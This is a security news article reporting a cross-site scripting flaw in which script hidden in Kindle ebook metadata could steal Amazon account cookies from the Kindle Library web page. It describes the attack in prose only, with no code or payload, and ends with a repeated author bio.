Malicious Kindle Ebook Leads To Take Over Your Amazon Account

  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

If you came across a Kindle e-book download link from any suspicious sources or somewhere other than Amazon itself, check twice before you proceed download. As downloading an eBook could put your personal information at risk.

A security researcher has uncovered a security hole in Amazon’s Kindle Library that could lead to cross-site scripting (XSS) attacks and account compromises when you upload a malicious ebook.

The flaw affects the “Manage Your Content and Devices” and “Manage your Kindle” services in Amazon’s web-based Kindle Library, which could allow a hacker to inject and hide malicious lines of code into into e-book metadata, such as the title text of an eBook, in order to compromise the security of your Amazon account.

Gaining access to your Amazon account credentials is one of the biggest boons for hackers, as they can set-up new credit cards in your account or max out the current ones on file with some big Amazon purchases. Additionally, they could compromise your other online accounts with the help of those credentials and personal information contained in your Amazon account.

 

“Malicious code can be injected via ebook metadata; for example, an ebook’s title,” wrote Mr Mussler on his personal blog, adding that “the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised.”

According to Mr Mussler, Amazon used his proof of concept attack code during its testing of the Manage your Kindle page and was surprised that an oversight suggests that the exploit is active. But, users who stick to e-books sold and delivered by Amazon are safe.

Thankfully, the exploit only affects users who download pirated eBooks from dubious sources, so don’t worry about adding an eBook to your Amazon shopping cart any time soon.

The following two tabs change content below.

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]